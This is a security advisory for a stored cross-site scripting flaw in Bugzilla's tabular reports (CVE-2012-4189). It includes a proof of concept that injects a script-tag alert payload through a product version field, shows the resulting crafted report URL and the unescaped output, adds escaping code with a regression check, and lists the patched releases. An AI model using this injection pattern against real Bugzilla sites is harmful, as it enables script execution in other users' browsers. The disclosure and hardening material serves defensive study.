Release date:
Updated on:
Affected Systems:
Mozilla Bugzilla 4.x
Mozilla Bugzilla 3.x
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56504
CVE id: CVE-2012-4189
Bugzilla is an open-source defect tracking system that manages the entire lifecycle of defects in software development, such as submitting, fixing, and closing defects.
Bugzilla does not properly filter field values in tabular reports. An attacker can exploit this vulnerability to inject script code, resulting in cross-site scripting.
<* Source: Mateusz Goik
Link: https://bugzilla.mozilla.org/show_bug.cgi?id=790296
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
PoC:
http://localhost/cgi-bin/bug/editversions.cgi?action=add&product=TestProduct ->
Version: "><script>alert(1);</script>
Add new bug to "TestProduct" with version "><script>alert(1);</script>
http://localhost/cgi-bin/bug/query.cgi?format=report-table ->
Horizontal Axis: Version
Should be the results: Version: "><script>alert(1);</script>
-> Generate Report
http://localhost/cgi-bin/bug/report.cgi?x_axis_field=version&region=&query_format=report-table&region=allwordssubstr&region=&resolution=---&longdesc_type=allwordssubstr&longdesc=&region=allwordssubstr&bug_file_loc&keywords_type=allwords&keywords=&deadlinefrom=&deadlineto=&bug_id=&bug_id_type=anyexact&version=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&types=1&emailtype1=substring&email1=&types=1&emailreporter2=1&emailcc2=1&emailtype2=substring&email2=&emaillongdesc3=1&emailtype3=substring&email3=&chfieldvalue=&chfieldfrom=&chfieldto=Now&j_top=AND&f1=noop&o1=noop&v1=&format=table&action=wrap
Result:
+ oColumn.field + "&amp;version="><script>alert(1);</script>'>"
elLiner.innerHTML = "<a href='buglist.cgi?action=wrap&amp;resolution=---&amp;version="><script>alert(1);</script>'>"
<a href="buglist.cgi?action=wrap&amp;resolution=---&amp;version="><script>alert(1);</script>">5</a>
<a href="buglist.cgi?action=wrap&amp;resolution=---&amp;=%20&amp;version="><script>alert(1);</script>">5</a>
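The result above shows the version value landing unescaped inside an href attribute. The following is an added example, not Bugzilla's code or the vendor's fix: it puts that link-building pattern beside a hardened form and a coarse check that flags the difference. All function names are hypothetical.

```javascript
// Added example; function names are hypothetical, not Bugzilla's code.

// Escape the characters that are significant in HTML text and quoted attributes.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern: the stored field value is concatenated raw into the href.
function cellLinkUnsafe(field, value, count) {
  return '<a href="buglist.cgi?action=wrap&amp;' + field + "=" + value + '">' +
    count + "</a>";
}

// Hardened pattern: URL-encode each query component, then HTML-escape the
// finished URL before it goes into the attribute.
function cellLinkSafe(field, value, count) {
  const url = "buglist.cgi?action=wrap&" +
    encodeURIComponent(field) + "=" + encodeURIComponent(value);
  return '<a href="' + escapeHtml(url) + '">' + escapeHtml(count) + "</a>";
}

// Coarse regression check: a report cell must consist of exactly one <a> tag
// with a cleanly quoted href, and its closing tag.
function hasInjectedMarkup(html) {
  const tags = html.match(/<[^>]*>/g) || [];
  return tags.length !== 2 ||
    !/^<a href="[^"<>]*">$/.test(tags[0]) ||
    tags[1] !== "</a>";
}

// Version value taken from the PoC on this page.
const POC_VERSION = '"><script>alert(1);</script>';

function demo() {
  const unsafe = cellLinkUnsafe("version", POC_VERSION, 5);
  const safe = cellLinkSafe("version", POC_VERSION, 5);
  return { unsafe, safe,
    unsafeFlagged: hasInjectedMarkup(unsafe),
    safeFlagged: hasInjectedMarkup(safe) };
}

console.log(demo());
```

This covers only the HTML attribute context; a value written into a JavaScript string literal, as in the elLiner.innerHTML line, also needs JavaScript-string escaping.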
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Mozilla
-------
The vendor has released patched versions 3.6.12, 4.0.9, 4.2.4, and 4.4rc1 to fix this security problem. Please download the update from the vendor's homepage:
http://www.mozilla.org/security/